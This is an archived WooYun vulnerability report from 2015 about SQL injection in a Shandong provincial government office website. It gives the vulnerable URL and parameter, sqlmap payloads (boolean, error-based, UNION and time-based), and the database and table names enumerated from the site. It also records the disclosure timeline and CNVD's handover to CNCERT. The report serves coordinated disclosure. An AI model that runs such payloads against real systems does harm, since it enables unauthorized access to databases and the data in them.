乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-09: 细节已通知厂商并且等待厂商处理中 2015-03-13: 厂商已经确认,细节仅向厂商公开 2015-03-23: 细节向核心白帽子及相关领域专家公开 2015-04-02: 细节向普通白帽子公开 2015-04-12: 细节向实习白帽子公开 2015-04-23: 细节向公众公开
山东省人民政府驻北京办事处经济贸易处一处sql注入漏洞
http://www.shandongipc.gov.cn/news_p.php?idp=52
Place: GETParameter: idp Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: idp=52 AND 7459=7459 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: idp=52 AND (SELECT 5737 FROM(SELECT COUNT(*),CONCAT(0x716b637171,(SELECT (CASE WHEN (5737=5737) THEN 1 ELSE 0 END)),0x7164626d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 1 column Payload: idp=-9930 UNION ALL SELECT CONCAT(0x716b637171,0x52755155446c4f6d7a5a,0x7164626d71)# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: idp=52 AND SLEEP(5)---[00:36:35] [INFO] the back-end DBMS is MySQLweb application technology: Apache, PHP 5.2.17back-end DBMS: MySQL 5.0[00:41:17] [INFO] fetching database names[00:41:17] [INFO] the SQL query used returns 2 entries[00:41:17] [INFO] resumed: "information_schema"[00:41:17] [INFO] resumed: "shangdong"available databases [2]: [*] information_schema[*] shangdong
[00:42:19] [INFO] fetching tables for database: 'shangdong'[00:42:19] [INFO] the SQL query used returns 15 entries[00:42:19] [INFO] resumed: "Userandip"[00:42:19] [INFO] resumed: "Zzday"[00:42:19] [INFO] resumed: "ader"[00:42:19] [INFO] resumed: "admin"[00:42:19] [INFO] resumed: "adminz"[00:42:19] [INFO] resumed: "article"[00:42:19] [INFO] resumed: "bigclass"[00:42:19] [INFO] resumed: "img"[00:42:19] [INFO] resumed: "news"[00:42:19] [INFO] resumed: "partd"[00:42:19] [INFO] resumed: "partd2"[00:42:19] [INFO] resumed: "smallclass"[00:42:19] [INFO] resumed: "test1"[00:42:19] [INFO] resumed: "x_user"[00:42:19] [INFO] resumed: "yqlink"Database: shangdong [15 tables]+------------+| Userandip || Zzday || ader || admin || adminz || article || bigclass || img || news || partd || partd2 || smallclass || test1 || x_user || yqlink |+------------+
已证明
危害等级:中
漏洞Rank:10
确认时间:2015-03-13 16:31
CNVD确认所述情况,已经转由CNCERT下发给分中心,由其后续协调网站管理单位处置。
暂无